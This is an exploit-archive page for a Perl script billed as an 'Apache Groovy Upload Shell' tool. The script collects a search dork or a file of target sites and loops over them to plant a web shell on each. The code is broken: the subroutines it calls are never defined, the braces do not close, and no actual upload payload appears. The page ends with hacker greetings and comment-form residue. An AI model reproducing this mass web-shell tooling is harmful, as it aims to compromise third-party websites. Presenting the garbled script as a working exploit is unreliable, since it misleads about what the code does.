Apache Groovy Upload Shell With Perl

2018.02.09

Mr.Rm19 (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

##############################################################################
#exploit author: Mr.Rm19
#09-02-2018
#Apache Groovy Upload Shell With Perl
#DORK: N/A
##################################################################################
# POC :
# #!/usr/bin/perl

#Copyright (c) 2018 - Mr.Rm19

use LWP::UserAgent;
use HTTP::Request::Common;
use Term::ANSIColor;
use HTTP::Request::Common qw(GET);
$ag = LWP::UserAgent->new();
$ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Mr.Rm19/20010801");
$ag->timeout(10);


$list= "list.txt";
if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }

my $datetime    = localtime;

system("title Mr.Rm19");
if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
print color('bold green');





print q(
                     __          .gp.__/                            
                       .ssSSSSSs.__    d$P^^^"                             
                    .sSSSSSSS$$$$$$$p.dP                                   
                  .SSSSSS$$$$$SSSSSSSS$bs+._                               
                .SSSS$$$$$SSSSS$$$$$$$SS$$$$b__                       /"-. 
                SSS$$$SSSSS$$$$$$$$SSSS$$$SSSS$b                   _/"-. / 
               :S$$$SSSSS$$$$$$$SSSSS$$$SSSS$$SSb                 //   /"-.
               $$SSSSS$$$$$$SSSSS$$$$$$S$$$$S$$$Sb.               ;   /   /
               SSSSS$$$$$SSSSS$$$$$$$SS'P   SS$$S`^b._.'         /:  :   / 
               :S$$$$$SSSSS$$$$$$$SSSP      :$SS$b              / ;  +-./  
                $$$$SSSS$$$$$$$SSSSSP        S$SS$;            / /  / / ;  
               d$$SSS$$$$$SSSSSSSSS' ,=._    :S':S$           / /  / / /   
              :$SSS$$$$SSSSSSSSS^"  '  _ ";  ;   S$          / /  / / /    
              SSS$$$SSSP.-TSS^"     .="$;   /    S;         / /  / / /     
             :SS$$$SSS$$ (;            "    \    P         / /  / : :      
             :S$$$SS$$$$b :                  \ .'         / /  /  :  \     
              T$$SS$$$$$j`-,    .          ,  \         /"-(  /   ;_-.\    
               `TSS$$$$P   ;    `.         `.-'        /  /\\/   .'/_ ;;   
                 TS$$$P    :             _.-;         /  /\\(   / /-" ;;   
                  SSS'      \           :-t"         : .-\\/ "-/":   //    
                .SS$$        `.          `-;  Mr.Rm19    )Y   y   /  ;  J/     
               :S$$$;          "-.        (          '"; j_.-/-./.-" \_    
               $S$SS              "j.     :            :/  ':    `-..' \   
              d$$SS;     :        /  "-._.'             `.  ;       `-./;  
            _S$$$SP       \      :                        \: :"-.      \;  
          ,$$$SSSj       , `.    ;                         : ;   "-,   /   
          S$$SS'"^-...___       : "-.                      ;/      ;  t    
      __.-`SS'---. `T$$$$$$q._       "-.                  / `.    /   ;    
  .-""__ `.'      `. `T$$$$$$$$b.       `.               :    "--"   /     
 /.-""  \/          `. T$$$$$$$$$$p.     .`._            /"-.  _   .'      
::      /             \ T$$$$$SS$$$$$b._  `.T$p.        /    "" ;-'        
;;     :               \ T$$$S$$$$$$$$$$$p._L$$$$p.    /       ,           
;;     ;                \ $$$$$$$$$$$$$$$$$$$SS$$$$$. /                    
::     ;                 ;:$$$$$$$$$$$$$$SSSSSSSSS$$$y        '            
 ;;    :                  "^$$$$$$$$$$$$$$$$$SSSS$$$P        /             
 ;;     b.                   "^$$$$$$$$$$$$$$$$$S$$'        /              
 ::     :$$p.  -._              "^$$$$$$$$$$$$$$$'         /               
  ;;     $$$$$p.                   "^$$$$$$$$$$P          /                
  ::     :$$$$$$p.                    "^$$$$$$P          ,                 
   ;;     T$$$$$$$$p.                    "^$$P                             
   ::      T$$$$$$$P "-.                    "           '                  
   s;;      $$$$$$P   d$$p._                     /     /                   
  S$$:      $$$$$t   d$$$$$$$p._          "-.  .'     /                    
  SS$;;     :P^"\ \.d$$$$$$$$$$$$p._         ""      /                     
   TS::      \   d$$$$$$$$$$$$$$$$$$$p._            /                      
    SS.\     .jq$$$$$$$$$$$$$$$$$$^^^^^""-._      .';                      
   $$$$.tsssj' `T$$$$$$$^^^^^"""            "-._.'  ;                      
   $$$SSS         \                 /            \ :                       
   '^SSS_          \               :          :    :                       
     $$$SS.         \              ;          :    ;                       
     '$$$SS          \            :           ;   :                        
       "^S$.          \           ;          :    :                        
         S$$b.         \                     ;    ;                        
         S$$$$          ;                   :    :                         
         'TSS$$$s.      :                   ;    ;                         
             TS$$Ss_    ;                   ;   :                          
              `SSS$$$p./                   :    ;                          
                  TS$$'            ;       ;    :                          
                   "S              :       ;     ;                         
                   /                ;      :     :                         
                  /                 :            :                         
                 /"-.                          .' ;                        
                /    ""--..__          __..--""   :                        
                             """"""""""                                    


);

print color('reset');
print "                       ";
print colored ("[ Mr.Rm19  ]",'white on_red');  
print colored ("[ Coded By Mr.Rm19 ]\n",'white on_red');
print "                           ";
print colored ("[ Start At $datetime ]",'white on_red'),"\n\n";

print color('bold red'),"[";
print color('bold green'),"1";
print color('bold red'),"] ";
print color("bold white"),"upload shel?     |> yes\n";
print color('bold red'),"[";
print color('bold green'),"2";
print color('bold red'),"] ";
print color('bold red'),"] ";
print color("bold white"),"Choose Number : ";
my $targett = <STDIN>;
chomp $targett;

if($targett eq '1')
{
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"[Sites?  ]\n";
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Give Me Dork:";
$dork=<STDIN>;
chomp($dork);
$dork=~s/ /+/g;
gassonee();
}

if($targett eq '2')
{
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
{
{ { 
{

}


if($targett eq '3')
{
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white")," Path to your websites list:";
my $list=<STDIN>;
chomp($list);
        open (THETARGET, "<$list") || die "[-] gAGaL";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;



OUTER: foreach $tofuck(@TARGETS){
chomp($tofuck);
if($tofuck =~ /http:\/\/(.*)\//) {
$tofuck= $1;
get();
}else{
get();
}

}

chomp($list); 
{
{
}
;

friend : c4ur un!onb4se 008 ./uzumak1 hacker sakit hati w4uw1k 190102 !0nt!5

See this note in RAW Version

Vote for this issue:

20%

80%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Apache Groovy Upload Shell With Perl

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.